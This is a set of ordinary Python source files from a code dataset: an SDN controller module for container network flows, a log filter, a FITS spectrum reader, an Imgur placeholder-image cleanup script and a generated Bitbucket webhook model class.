index_label='epoch')\n","sub_path":"clone.py","file_name":"clone.py","file_ext":"py","file_size_in_byte":5100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"153902465","text":"import logging\n\nfrom ryu import cfg\nfrom ryu.lib import dpid as dpid_lib\nfrom ryu.ofproto import ether\nfrom ryu.ofproto import inet\n\nfrom daolicontroller import exception\nfrom daolicontroller import utils\nfrom daolicontroller.lib.base import PacketBase\nfrom daolicontroller.lib.constants import CONNECTED, DISCONNECTED\n\nCONF = cfg.CONF\nLOG = logging.getLogger(__name__)\n\nINFILTER = [2375]\nOUTFILTER = [4001]\n\n\nclass PacketIPv4(PacketBase):\n priority = 1\n\n def _redirect(self, dp, inport, outport, **kwargs):\n kwargs['eth_type'] = ether.ETH_TYPE_IP\n 
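# Accounting sketch for the generator in clone.py above: every CSV row yields
# the center, left and right camera frames, and each frame is also flipped
# horizontally, so one row becomes six samples. That is why the fit calls use
# samples_per_epoch = len(train_samples) * AUG_FACTOR with AUG_FACTOR = 6.
CAMERAS = 3           # center, left, right
VIEWS_PER_IMAGE = 2   # original + horizontal flip
assert CAMERAS * VIEWS_PER_IMAGE == 6
# The flip also negates the steering angle, and the +/-0.1 corrections
# approximate the left/right camera viewpoints.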
super(PacketIPv4, self)._redirect(dp, inport, outport, **kwargs)\n\n def init_flow(self, dp, gateway):\n int_port = self.port_get(dp, gateway['IntDev'])\n if not int_port:\n return False\n\n # Add flow where is from local host.\n self._redirect(dp, dp.ofproto.OFPP_LOCAL, int_port.port_no,\n ipv4_src=gateway['IntIP'])\n\n # Add icmp flow coming from outer.\n self._redirect(dp, int_port.port_no, dp.ofproto.OFPP_LOCAL,\n ip_proto=inet.IPPROTO_ICMP, ipv4_dst=gateway['IntIP'])\n\n # Add initial port flow. eg: docker socket port, etcd port.\n for port in INFILTER:\n self._redirect(dp, int_port.port_no, dp.ofproto.OFPP_LOCAL,\n ip_proto=inet.IPPROTO_TCP, ipv4_dst=gateway['IntIP'],\n tcp_dst=port)\n\n for port in OUTFILTER:\n self._redirect(dp, int_port.port_no, dp.ofproto.OFPP_LOCAL,\n ip_proto=inet.IPPROTO_TCP, ipv4_dst=gateway['IntIP'],\n tcp_src=port)\n\n def filter(self, src, dst):\n peer = \"%s:%s\" % (src['Id'], dst['Id'])\n try:\n action = self.client.policy(peer)\n if action == CONNECTED:\n return True\n elif action == DISCONNECTED:\n return False\n except Exception:\n return False\n\n if src['NetworkName'] != dst['NetworkName']:\n # returns if group exists src and dst network\n if not self.client.group(src['NetworkName'], dst['NetworkName']):\n return False\n\n return True\n\n def _firewall(self, msg, dp, in_port, pkt_ether, pkt_ipv4, pkt_tp, fw, gateway):\n ofp, ofp_parser, ofp_set, ofp_out = self.ofp_get(dp)\n\n container = self.get(fw['Container'])\n if not container:\n raise exception.ContainerNotFound(container=fw['Container'])\n\n if pkt_ipv4.proto == inet.IPPROTO_TCP:\n input_key = ofp_set(tcp_dst=fw['ServicePort'])\n output_key = ofp_set(tcp_src=pkt_tp.dst_port)\n input_kwargs = {\n 'tcp_src': pkt_tp.src_port,\n 'tcp_dst': pkt_tp.dst_port,\n }\n output_kwargs = {\n 'tcp_src': fw['ServicePort'],\n 'tcp_dst': pkt_tp.src_port,\n }\n rinput_kwargs = {\n 'tcp_src': pkt_tp.src_port,\n 'tcp_dst': fw['ServicePort'],\n }\n else:\n input_key = ofp_set(udp_dst=fw['ServicePort'])\n output_key = ofp_set(udp_src=pkt_tp.dst_port)\n input_kwargs = {\n 'udp_src': pkt_tp.src_port,\n 'udp_dst': pkt_tp.dst_port,\n }\n output_kwargs = {\n 'udp_src': fw['ServicePort'],\n 'udp_dst': pkt_tp.src_port,\n }\n rinput_kwargs = {\n 'udp_src': pkt_tp.src_port,\n 'udp_dst': fw['ServicePort'],\n }\n\n input_match = ofp_parser.OFPMatch(\n in_port=in_port,\n eth_type=ether.ETH_TYPE_IP,\n ip_proto=pkt_ipv4.proto,\n ipv4_src=pkt_ipv4.src,\n ipv4_dst=pkt_ipv4.dst,\n **input_kwargs)\n\n output_actions = [\n ofp_set(eth_src=pkt_ether.dst),\n ofp_set(eth_dst=pkt_ether.src),\n ofp_set(ipv4_src=pkt_ipv4.dst),\n ofp_set(ipv4_dst=pkt_ipv4.src)]\n\n output_actions.append(output_key)\n output_actions.append(ofp_out(in_port))\n\n if gateway['DatapathID'] != container['DataPath']:\n cgateway = self.gateway_get(container['DataPath'])\n rdp = self.ryuapp.dps[dpid_lib.str_to_dpid(container['DataPath'])]\n rofp, rofp_parser, rofp_set, rofp_out = self.ofp_get(rdp)\n\n gwport = self.port_get(rdp, id=container['NetworkId'])\n cport = self.port_get(rdp, id=container['EndpointID'])\n if not cport or not gwport:\n raise exception.DevicePortNotFound()\n\n liport = self.port_get(rdp, gateway['IntDev'])\n riport = self.port_get(rdp, cgateway['IntDev'])\n\n input_actions = [\n ofp_set(eth_src=gateway['IntDev']),\n ofp_set(eth_dst=cgateway['IntDev']),\n ofp_set(ipv4_dst=container['VIPAddress'])]\n\n input_actions.append(input_key)\n input_actions.append(ofp_out(liport))\n\n output_match = ofp_parser.OFPMatch(\n in_port=liport.port_no,\n 
eth_type=ether.ETH_TYPE_IP,\n                ip_proto=pkt_ipv4.proto,\n                ipv4_src=container['VIPAddress'],\n                ipv4_dst=pkt_ipv4.src,\n                **output_kwargs)\n\n            remote_input_match = rofp_parser.OFPMatch(\n                in_port=riport.port_no,\n                eth_type=ether.ETH_TYPE_IP,\n                ip_proto=pkt_ipv4.proto,\n                ipv4_src=pkt_ipv4.src,\n                ipv4_dst=container['VIPAddress'],\n                **rinput_kwargs)\n\n            remote_input_actions = [\n                rofp_set(eth_src=gwport.hw_addr),\n                rofp_set(eth_dst=container['MacAddress']),\n                rofp_set(ipv4_dst=container['IPAddress'])]\n\n            remote_input_actions.append(rofp_out(cport.port_no))\n\n            remote_output_match = rofp_parser.OFPMatch(\n                in_port=cport.port_no,\n                eth_type=ether.ETH_TYPE_IP,\n                ip_proto=pkt_ipv4.proto,\n                ipv4_src=container['IPAddress'],\n                ipv4_dst=pkt_ipv4.src,\n                **output_kwargs)\n\n            remote_output_actions = [\n                rofp_set(eth_src=cgateway['IntDev']),\n                rofp_set(eth_dst=gateway['IntDev']),\n                rofp_set(ipv4_src=container['VIPAddress'])]\n\n            # The reply flow leaves the remote switch through its inter-gateway port.\n            remote_output_actions.append(rofp_out(riport.port_no))\n\n            self.add_flow(rdp, remote_output_match, remote_output_actions)\n            self.add_flow(rdp, remote_input_match, remote_input_actions)\n            self.packet_out(msg, dp, remote_input_actions)\n        else:\n            gwport = self.port_get(dp, id=container['NetworkId'])\n            cport = self.port_get(dp, id=container['EndpointID'])\n            if not cport or not gwport:\n                raise exception.DevicePortNotFound()\n\n            input_actions = [\n                ofp_set(eth_src=gwport.hw_addr),\n                ofp_set(eth_dst=container['MacAddress']),\n                ofp_set(ipv4_dst=container['IPAddress'])]\n\n            input_actions.append(input_key)\n            input_actions.append(ofp_out(cport.port_no))\n\n            output_match = ofp_parser.OFPMatch(\n                in_port=cport.port_no,\n                eth_type=ether.ETH_TYPE_IP,\n                ip_proto=pkt_ipv4.proto,\n                ipv4_src=container['IPAddress'],\n                ipv4_dst=pkt_ipv4.src,\n                **output_kwargs)\n\n            self.add_flow(dp, output_match, output_actions)\n            self.add_flow(dp, input_match, input_actions)\n            self.packet_out(msg, dp, input_actions)\n\n    def firewall(self, msg, dp, in_port, pkt_ether, pkt_ipv4, pkt_tp, gateway):\n        ofp, ofp_parser, ofp_set, ofp_out = self.ofp_get(dp)\n\n        port = self.port_get(dp, gateway['IntDev'])\n        if not port:\n            raise exception.DevicePortNotFound()\n\n        if in_port == port.port_no or in_port == ofp.OFPP_LOCAL:\n            if pkt_ipv4.proto == inet.IPPROTO_ICMP:\n                return True\n\n            if in_port == ofp.OFPP_LOCAL:\n                outport = port.port_no\n            else:\n                outport = ofp.OFPP_LOCAL\n\n            fw = self.client.firewall(gateway['DatapathID'], pkt_tp.dst_port)\n            if fw:\n                self._firewall(msg, dp, in_port, pkt_ether, pkt_ipv4, pkt_tp, fw, gateway)\n            else:\n                kwargs = {\n                    'ipv4_src': pkt_ipv4.src,\n                    'ipv4_dst': pkt_ipv4.dst,\n                    'timeout': CONF.timeout}\n                if pkt_ipv4.proto == inet.IPPROTO_TCP:\n                    kwargs['tcp_src'] = pkt_tp.src_port\n                    kwargs['tcp_dst'] = pkt_tp.dst_port\n                else:\n                    kwargs['udp_src'] = pkt_tp.src_port\n                    kwargs['udp_dst'] = pkt_tp.dst_port\n\n                actions = [ofp_parser.OFPActionOutput(outport)]\n                self._redirect(dp, in_port, outport, ip_proto=pkt_ipv4.proto, **kwargs)\n                self.packet_out(msg, dp, actions)\n            return True\n\n        return False\n\n    def run(self, msg, pkt_ether, pkt_ipv4, pkt_tp, gateway, **kwargs):\n        dp = msg.datapath\n        in_port = msg.match['in_port']\n\n        try:\n            ret = self.firewall(msg, dp, in_port, pkt_ether,\n                                pkt_ipv4, pkt_tp, gateway)\n            if ret:\n                return True\n        except Exception:\n            return False\n\n        src = self.get(pkt_ether.src)\n        if not src:\n            return False\n\n        dst = self.get(pkt_ipv4.dst)\n        if not dst:\n            self.public_flow(msg, dp, pkt_ether, pkt_ipv4, in_port, src)\n            return True\n\n        if not self.filter(src, dst):\n            return False\n\n        snode, dnode = 
src.get('Node'), dst.get('Node')\n if not snode or not dnode:\n snode = dnode = utils.gethostname()\n\n # the same node\n if snode == dnode:\n dst_port = self.port_get(dp, id=dst['EndpointID'])\n if not dst_port:\n return False\n\n ofp, ofp_parser, ofp_set, ofp_out = self.ofp_get(dp)\n\n if pkt_ether.dst != dst['MacAddress']:\n submac = pkt_ether.dst\n else:\n submac = None\n\n def local_flow(smac, dmac, sip, dip, iport, oport):\n match = ofp_parser.OFPMatch(\n in_port=iport,\n eth_type=ether.ETH_TYPE_IP,\n eth_src=smac,\n ipv4_src=sip,\n ipv4_dst=dip)\n actions = ([ofp_set(eth_src=submac)]\n if submac is not None else [])\n actions.extend([ofp_set(eth_dst=dmac), ofp_out(oport)])\n self.add_flow(dp, match, actions)\n\n return actions\n\n local_flow(dst['MacAddress'], src['MacAddress'],\n pkt_ipv4.dst, pkt_ipv4.src,\n dst_port.port_no, in_port)\n self.packet_out(msg, dp, local_flow(\n src['MacAddress'], dst['MacAddress'],\n pkt_ipv4.src, pkt_ipv4.dst,\n in_port, dst_port.port_no))\n else:\n if not dst.get('DataPath'):\n LOG.info(\"target ovs could not be registered.\")\n return False\n\n self.host_flow(msg, dp, in_port, pkt_ether, pkt_ipv4, gateway, src, dst)\n\n def host_flow(self, msg, dp, in_port, pkt_ether, pkt_ipv4, src_gateway, src, dst):\n ofp, ofp_parser, ofp_set, ofp_out = self.ofp_get(dp)\n liport = self.port_get(dp, src_gateway['IntDev'])\n\n rdp = self.ryuapp.dps[dpid_lib.str_to_dpid(dst['DataPath'])]\n\n dst_port = self.port_get(rdp, id=dst['EndpointID'])\n if not dst_port:\n return\n\n dst_gateway = self.gateway_get(dst['DataPath'])\n rofp, rofp_parser, rofp_set, rofp_out = self.ofp_get(rdp)\n riport = self.port_get(rdp, dst_gateway['IntDev'])\n\n output_local_match = ofp_parser.OFPMatch(\n in_port=in_port,\n eth_type=ether.ETH_TYPE_IP,\n eth_src=pkt_ether.src,\n ipv4_src=pkt_ipv4.src,\n ipv4_dst=pkt_ipv4.dst)\n\n output_local_actions = [\n ofp_set(eth_src=liport.hw_addr),\n ofp_set(eth_dst=riport.hw_addr),\n ofp_set(ipv4_src=src['VIPAddress']),\n ofp_set(ipv4_dst=dst['VIPAddress']),\n ofp_out(liport.port_no),\n ]\n\n input_remote_match = rofp_parser.OFPMatch(\n in_port=riport.port_no,\n eth_type=ether.ETH_TYPE_IP,\n eth_dst=riport.hw_addr,\n #ipv4_src=pkt_ipv4.src,\n #ipv4_dst=pkt_ipv4.dst)\n ipv4_src=src['VIPAddress'],\n ipv4_dst=dst['VIPAddress'])\n\n if pkt_ether.dst == dst['MacAddress']:\n dst_srcmac = pkt_ether.src\n else:\n gwport = self.port_get(rdp, id=dst['NetworkId'])\n dst_srcmac = gwport.hw_addr\n\n input_remote_actions = [\n rofp_set(eth_src=dst_srcmac),\n rofp_set(eth_dst=dst['MacAddress']),\n rofp_set(ipv4_src=pkt_ipv4.src),\n rofp_set(ipv4_dst=pkt_ipv4.dst),\n rofp_out(dst_port.port_no)]\n\n output_remote_match = rofp_parser.OFPMatch(\n in_port=dst_port.port_no,\n eth_type=ether.ETH_TYPE_IP,\n eth_src=dst['MacAddress'],\n ipv4_src=pkt_ipv4.dst,\n ipv4_dst=pkt_ipv4.src)\n\n output_remote_actions = [\n rofp_set(eth_src=riport.hw_addr),\n rofp_set(eth_dst=liport.hw_addr),\n rofp_set(ipv4_src=dst['VIPAddress']),\n rofp_set(ipv4_dst=src['VIPAddress']),\n ofp_out(riport.port_no),\n ]\n\n input_local_match = ofp_parser.OFPMatch(\n in_port=liport.port_no,\n eth_type=ether.ETH_TYPE_IP,\n eth_dst=liport.hw_addr,\n #ipv4_src=pkt_ipv4.dst,\n #ipv4_dst=pkt_ipv4.src)\n ipv4_src=dst['VIPAddress'],\n ipv4_dst=src['VIPAddress'])\n\n input_local_actions = [\n ofp_set(eth_src=pkt_ether.dst),\n ofp_set(eth_dst=pkt_ether.src),\n ofp_set(ipv4_src=pkt_ipv4.dst),\n ofp_set(ipv4_dst=pkt_ipv4.src),\n ofp_out(in_port),\n ]\n\n self.add_flow(rdp, input_remote_match, 
input_remote_actions)\n        self.add_flow(rdp, output_remote_match, output_remote_actions)\n        self.add_flow(dp, input_local_match, input_local_actions)\n        self.add_flow(dp, output_local_match, output_local_actions)\n        self.packet_out(msg, dp, output_local_actions)\n\n    def public_flow(self, msg, dp, pkt_ether, pkt_ipv4, in_port, src):\n        ofp, ofp_parser, ofp_set, ofp_out = self.ofp_get(dp)\n        gwport = self.port_get(dp, id=src['NetworkId'])\n        if not gwport:\n            return\n\n        output_match = ofp_parser.OFPMatch(\n            in_port=in_port,\n            eth_type=ether.ETH_TYPE_IP,\n            eth_src=pkt_ether.src,\n            ipv4_src=pkt_ipv4.src,\n            ipv4_dst=pkt_ipv4.dst)\n\n        output_actions = [ofp_out(gwport.port_no)]\n\n        input_match = ofp_parser.OFPMatch(\n            in_port=gwport.port_no,\n            eth_type=ether.ETH_TYPE_IP,\n            eth_src=gwport.hw_addr,\n            ipv4_src=pkt_ipv4.dst,\n            ipv4_dst=pkt_ipv4.src)\n\n        input_actions = [\n            ofp_set(eth_dst=pkt_ether.src),\n            ofp_out(in_port),\n            ]\n\n        self.add_flow(dp, input_match, input_actions)\n        self.add_flow(dp, output_match, output_actions)\n        self.packet_out(msg, dp, output_actions)\n\n    def flow_delete(self, sid, did):\n        # Delete the flows on both endpoints' switches, in both directions.\n        src = self.get(sid)\n        dst = self.get(did)\n        if not src or not dst:\n            return\n\n        sdp_id = dpid_lib.str_to_dpid(src['DataPath'])\n        ddp_id = dpid_lib.str_to_dpid(dst['DataPath'])\n\n        if sdp_id in self.ryuapp.dps:\n            dp = self.ryuapp.dps[sdp_id]\n            ofp, ofp_parser, _, _ = self.ofp_get(dp)\n\n            port = self.port_get(dp, id=src['EndpointID'])\n            if port:\n                match = ofp_parser.OFPMatch(\n                    in_port=port.port_no,\n                    eth_type=ether.ETH_TYPE_IP,\n                    ipv4_src=src['IPAddress'],\n                    ipv4_dst=dst['IPAddress'])\n\n                self.delete_flow(dp, match)\n\n        if ddp_id in self.ryuapp.dps:\n            dp = self.ryuapp.dps[ddp_id]\n            ofp, ofp_parser, _, _ = self.ofp_get(dp)\n\n            port = self.port_get(dp, id=dst['EndpointID'])\n            if port:\n                match = ofp_parser.OFPMatch(\n                    in_port=port.port_no,\n                    eth_type=ether.ETH_TYPE_IP,\n                    ipv4_src=dst['IPAddress'],\n                    ipv4_dst=src['IPAddress'])\n\n                self.delete_flow(dp, match)\n\n    def remove_flow(self, container):\n        dp_id = dpid_lib.str_to_dpid(container['DataPath'])\n        if dp_id in self.ryuapp.dps:\n            dp = self.ryuapp.dps[dp_id]\n            ofp, ofp_parser, _, _ = self.ofp_get(dp)\n            match = ofp_parser.OFPMatch(\n                eth_type=ether.ETH_TYPE_IP,\n                ipv4_src=container['IPAddress'])\n            self.delete_flow(dp, match)\n\n            match = ofp_parser.OFPMatch(\n                eth_type=ether.ETH_TYPE_IP,\n                ipv4_dst=container['IPAddress'])\n            self.delete_flow(dp, match)\n\n            match = ofp_parser.OFPMatch(\n                eth_type=ether.ETH_TYPE_IP,\n                ipv4_src=container['VIPAddress'])\n            self.delete_flow(dp, match)\n\n            match = ofp_parser.OFPMatch(\n                eth_type=ether.ETH_TYPE_IP,\n                ipv4_dst=container['VIPAddress'])\n            self.delete_flow(dp, match)\n\n","sub_path":"daolicontroller/lib/ipv4.py","file_name":"ipv4.py","file_ext":"py","file_size_in_byte":18468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"202444986","text":"#!/usr/bin/python\nimport sys\nimport re\n\nfor line in sys.stdin.readlines():\n    numberList = re.findall('\\d+', line)\n    ip = line.split(' ', 1)[0]\n    sys.stdout.write('{}, {} \\n'.format(ip, numberList[-1]))\n\nsys.stdout.flush()\n","sub_path":"Assignment4/Py2/fltr_wlog_ip_trbts_toops.py","file_name":"fltr_wlog_ip_trbts_toops.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"328927866","text":"import numpy as np \r\nfrom astropy.io import fits\r\n\r\n\r\ndef lectorFits(rutaEspectrograma):\r\n    \"\"\"\r\n    lectorFits\r\n    
==========\r\n    Reads a FITS file. It prints the HDU list, the file header (so the user can\r\n    check the data rows) and the shape of the data array, writes two txt files\r\n    with the wavelength and the flux, and returns two arrays, one with the\r\n    wavelength and one with the flux.\r\n\r\n    Parameters\r\n    ----------\r\n    -rutaEspectrograma: string with the path of the fits file. If the file holds\r\n    an array with more than one row of data, it is important to check that the\r\n    function writes the row we actually want into the variable.\r\n\r\n    Returns\r\n    -------\r\n    -Two txt files, one with the wavelength and one with the flux.\r\n    \r\n    -Two arrays, one with the wavelength and one with the flux.\r\n    \"\"\"\r\n    archivoFits = fits.open(rutaEspectrograma)\r\n    archivoFits.info()\r\n\r\n    # Extract the FITS header.\r\n    # We take [0] because in this example the PRIMARY HDU is at index 0. The\r\n    # primary HDU of a FITS file is the array that holds the main data.\r\n\r\n    head = archivoFits[0].header\r\n    print(repr(head))\r\n    print(archivoFits[0].data.shape)\r\n\r\n    # Extract the FITS data and build the wavelength axis.\r\n    dataEspec = np.zeros((2,len(archivoFits[0].data[0,:])))\r\n\r\n    # Each pixel of the spectrogram spans 0.9 angstroms.\r\n    wave = []\r\n    for i in range(len(dataEspec[0,:])):\r\n        wave.append(3500.0+(i*0.9))\r\n\r\n    wave = np.array(wave)\r\n    wave = wave.round(2)\r\n\r\n    dataEspec[0,:] = wave\r\n    dataEspec[1,:] = archivoFits[0].data[0,:]\r\n\r\n    # Trim the noisy samples at the start and the end.\r\n    data = np.zeros((2,len(dataEspec[0,:])-150))\r\n    data[0,:] = dataEspec[0,75:-75]\r\n    data[1,:] = dataEspec[1,75:-75]\r\n\r\n    # Write the TXT files.\r\n    np.savetxt(\"wavelength.txt\",data[0,:])\r\n    np.savetxt(\"flux.txt\",data[1,:])\r\n\r\n    archivoFits.close()\r\n\r\n    wavelength = data[0,:]\r\n    flux = data[1,:]\r\n\r\n    return wavelength, flux\r\n","sub_path":"lectorFits.py","file_name":"lectorFits.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"411288379","text":"import os\nfrom get_media_files import GetMediaFiles\nimport time\nimport hashlib\nimport click\n\n\ndef are_files_equal(file1, file2):\n    \"\"\"given two file objects, checks to see if their bytes are equal\"\"\"\n    if bytearray(file1.read()) == bytearray(file2.read()):\n        return True\n    else:\n        return False\n\n\ndef is_imgur_dne_image(img_path):\n    \"\"\"takes full image path & checks if bytes are equal to that of imgur\n    does not exist image\n    \"\"\"\n    module_path = os.path.abspath(os.path.dirname(__file__))\n    # edit location if needed\n    dne_img = os.path.join(module_path, 'imgur-dne.png')\n    with open(dne_img, 'rb') as f:\n        dne_data = bytearray(f.read())\n    with open(img_path, 'rb') as f:\n        data = bytearray(f.read())\n    if data == dne_data:\n        return True\n    else:\n        return False\n\n\ndef hashfile(afile, hasher, blocksize=65536):\n    buf = afile.read(blocksize)\n    while len(buf) > 0:\n        hasher.update(buf)\n        buf = afile.read(blocksize)\n    return hasher.hexdigest()\n\n\ndef delete_dne_hash_cmp(path, recursive=False, verbose=False):\n    \"\"\"Delete file if its hash matches that of the reference file\"\"\"\n\n    media = GetMediaFiles()\n    files = media.get_info(path=path, recursive=recursive,\n                           track_types=['Image'], sort=False)\n\n    if verbose:\n        print(files)\n        print('%s files found' % len(files))  # debug\n        print('-------------------------')  # debug\n\n    init_t = time.time()\n\n    
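# Usage sketch for the chunked hashfile helper in delete_dne.py above
# (illustrative; the block size mirrors the original). Hashing in 64 KiB blocks
# keeps memory flat on large images, and two files can be treated as duplicates
# when their SHA-256 digests match.
import hashlib

def files_match(path_a, path_b, blocksize=65536):
    digests = []
    for path in (path_a, path_b):
        h = hashlib.sha256()
        with open(path, 'rb') as f:
            for chunk in iter(lambda: f.read(blocksize), b''):
                h.update(chunk)
        digests.append(h.hexdigest())
    return digests[0] == digests[1]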
# imgur dne image hashlib\n dne_hash = hashfile(open('imgur-dne.png', 'rb'), hashlib.sha256())\n\n # list of hashes\n hashes = list((hashfile(open(fname[0], 'rb'), hashlib.sha256())) for fname in files)\n amount_deleted = 0\n for index in range(len(hashes)):\n if hashes[index] == dne_hash:\n amount_deleted += 1\n os.remove(files[index][0])\n\n print(\"delete_dne_hash_cmp func took %d seconds\\n\" % (int(time.time() - init_t)))\n\n return amount_deleted\n\n\ndef delete_dne(path, recursive=False, verbose=False):\n \"\"\"Delete duplicate file if its byte array matches that of the reference\n \"\"\"\n\n media = GetMediaFiles()\n files = media.get_info(path=path, recursive=recursive,\n track_types=['Image'], sort=False)\n\n init_t = time.time()\n\n if verbose:\n print(files)\n print('%s files found' % len(files)) # debug\n print('-------------------------') # debug\n\n amount_deleted = 0\n # loop over files & check if it's an Imgur DNE image\n for f in files:\n if verbose:\n print(f[0]) # debug\n\n if is_imgur_dne_image(f[0]):\n amount_deleted += 1\n print('%s' % (os.path.split(f[0])[1]))\n os.remove(f[0])\n\n print(\"delete_dne func took %d seconds\\n\" % (int(time.time() - init_t)))\n return amount_deleted\n\n\nif __name__ == \"__main__\":\n @click.command()\n @click.argument('folder')\n @click.option('-r', '--recursive', default=False, is_flag=True)\n def main(folder, recursive):\n init_t = time.time()\n\n folder = os.path.abspath(folder)\n amount_deleted = delete_dne(folder, recursive, verbose=True)\n\n # test_path = 'test-case'\n # delete_dne(test_path, recursive=True)\n\n print('[delete_imgur_dne] %i seconds passed' %\n (time.time() - init_t))\n print('[delete_imgur_dne] %i DNE images found & deleted' %\n amount_deleted)\n\n main()\n","sub_path":"misc_scripts/delete_imgur_dne/delete_dne.py","file_name":"delete_dne.py","file_ext":"py","file_size_in_byte":3500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"488157901","text":"# coding: utf-8\n\n\"\"\"\n Bitbucket API\n\n Code against the Bitbucket API to automate simple tasks, embed Bitbucket data into your own site, build mobile or desktop apps, or even add custom UI add-ons into Bitbucket itself using the Connect framework. 
# noqa: E501\n\n The version of the OpenAPI document: 2.0\n Contact: support@bitbucket.org\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\n\nclass WebhookSubscription(object):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n openapi_types = {\n 'active': 'bool',\n 'created_at': 'datetime',\n 'description': 'str',\n 'events': 'list[str]',\n 'subject': 'object',\n 'subject_type': 'str',\n 'url': 'str',\n 'uuid': 'str'\n }\n\n attribute_map = {\n 'active': 'active',\n 'created_at': 'created_at',\n 'description': 'description',\n 'events': 'events',\n 'subject': 'subject',\n 'subject_type': 'subject_type',\n 'url': 'url',\n 'uuid': 'uuid'\n }\n\n def __init__(self, active=None, created_at=None, description=None, events=None, subject=None, subject_type=None, url=None, uuid=None): # noqa: E501\n \"\"\"WebhookSubscription - a model defined in OpenAPI\"\"\" # noqa: E501\n\n self._active = None\n self._created_at = None\n self._description = None\n self._events = None\n self._subject = None\n self._subject_type = None\n self._url = None\n self._uuid = None\n self.discriminator = None\n\n if active is not None:\n self.active = active\n if created_at is not None:\n self.created_at = created_at\n if description is not None:\n self.description = description\n if events is not None:\n self.events = events\n if subject is not None:\n self.subject = subject\n if subject_type is not None:\n self.subject_type = subject_type\n if url is not None:\n self.url = url\n if uuid is not None:\n self.uuid = uuid\n\n @property\n def active(self):\n \"\"\"Gets the active of this WebhookSubscription. # noqa: E501\n\n\n :return: The active of this WebhookSubscription. # noqa: E501\n :rtype: bool\n \"\"\"\n return self._active\n\n @active.setter\n def active(self, active):\n \"\"\"Sets the active of this WebhookSubscription.\n\n\n :param active: The active of this WebhookSubscription. # noqa: E501\n :type: bool\n \"\"\"\n\n self._active = active\n\n @property\n def created_at(self):\n \"\"\"Gets the created_at of this WebhookSubscription. # noqa: E501\n\n\n :return: The created_at of this WebhookSubscription. # noqa: E501\n :rtype: datetime\n \"\"\"\n return self._created_at\n\n @created_at.setter\n def created_at(self, created_at):\n \"\"\"Sets the created_at of this WebhookSubscription.\n\n\n :param created_at: The created_at of this WebhookSubscription. # noqa: E501\n :type: datetime\n \"\"\"\n\n self._created_at = created_at\n\n @property\n def description(self):\n \"\"\"Gets the description of this WebhookSubscription. # noqa: E501\n\n A user-defined description of the webhook. # noqa: E501\n\n :return: The description of this WebhookSubscription. # noqa: E501\n :rtype: str\n \"\"\"\n return self._description\n\n @description.setter\n def description(self, description):\n \"\"\"Sets the description of this WebhookSubscription.\n\n A user-defined description of the webhook. # noqa: E501\n\n :param description: The description of this WebhookSubscription. # noqa: E501\n :type: str\n \"\"\"\n\n self._description = description\n\n @property\n def events(self):\n \"\"\"Gets the events of this WebhookSubscription. 
# noqa: E501\n\n The events this webhook is subscribed to. # noqa: E501\n\n :return: The events of this WebhookSubscription. # noqa: E501\n :rtype: list[str]\n \"\"\"\n return self._events\n\n @events.setter\n def events(self, events):\n \"\"\"Sets the events of this WebhookSubscription.\n\n The events this webhook is subscribed to. # noqa: E501\n\n :param events: The events of this WebhookSubscription. # noqa: E501\n :type: list[str]\n \"\"\"\n allowed_values = [\"pullrequest:unapproved\", \"issue:comment_created\", \"pullrequest:approved\", \"repo:created\", \"repo:deleted\", \"repo:imported\", \"pullrequest:comment_updated\", \"issue:updated\", \"project:updated\", \"pullrequest:comment_created\", \"repo:commit_status_updated\", \"pullrequest:updated\", \"issue:created\", \"repo:fork\", \"pullrequest:comment_deleted\", \"repo:commit_status_created\", \"repo:updated\", \"pullrequest:rejected\", \"pullrequest:fulfilled\", \"repo:push\", \"pullrequest:created\", \"repo:transfer\", \"repo:commit_comment_created\"] # noqa: E501\n if not set(events).issubset(set(allowed_values)):\n raise ValueError(\n \"Invalid values for `events` [{0}], must be a subset of [{1}]\" # noqa: E501\n .format(\", \".join(map(str, set(events) - set(allowed_values))), # noqa: E501\n \", \".join(map(str, allowed_values)))\n )\n\n self._events = events\n\n @property\n def subject(self):\n \"\"\"Gets the subject of this WebhookSubscription. # noqa: E501\n\n\n :return: The subject of this WebhookSubscription. # noqa: E501\n :rtype: object\n \"\"\"\n return self._subject\n\n @subject.setter\n def subject(self, subject):\n \"\"\"Sets the subject of this WebhookSubscription.\n\n\n :param subject: The subject of this WebhookSubscription. # noqa: E501\n :type: object\n \"\"\"\n\n self._subject = subject\n\n @property\n def subject_type(self):\n \"\"\"Gets the subject_type of this WebhookSubscription. # noqa: E501\n\n The type of entity, which is `repository` in the case of webhook subscriptions on repositories. # noqa: E501\n\n :return: The subject_type of this WebhookSubscription. # noqa: E501\n :rtype: str\n \"\"\"\n return self._subject_type\n\n @subject_type.setter\n def subject_type(self, subject_type):\n \"\"\"Sets the subject_type of this WebhookSubscription.\n\n The type of entity, which is `repository` in the case of webhook subscriptions on repositories. # noqa: E501\n\n :param subject_type: The subject_type of this WebhookSubscription. # noqa: E501\n :type: str\n \"\"\"\n allowed_values = [\"user\", \"repository\", \"team\"] # noqa: E501\n if subject_type not in allowed_values:\n raise ValueError(\n \"Invalid value for `subject_type` ({0}), must be one of {1}\" # noqa: E501\n .format(subject_type, allowed_values)\n )\n\n self._subject_type = subject_type\n\n @property\n def url(self):\n \"\"\"Gets the url of this WebhookSubscription. # noqa: E501\n\n The URL events get delivered to. # noqa: E501\n\n :return: The url of this WebhookSubscription. # noqa: E501\n :rtype: str\n \"\"\"\n return self._url\n\n @url.setter\n def url(self, url):\n \"\"\"Sets the url of this WebhookSubscription.\n\n The URL events get delivered to. # noqa: E501\n\n :param url: The url of this WebhookSubscription. # noqa: E501\n :type: str\n \"\"\"\n\n self._url = url\n\n @property\n def uuid(self):\n \"\"\"Gets the uuid of this WebhookSubscription. # noqa: E501\n\n The webhook's id # noqa: 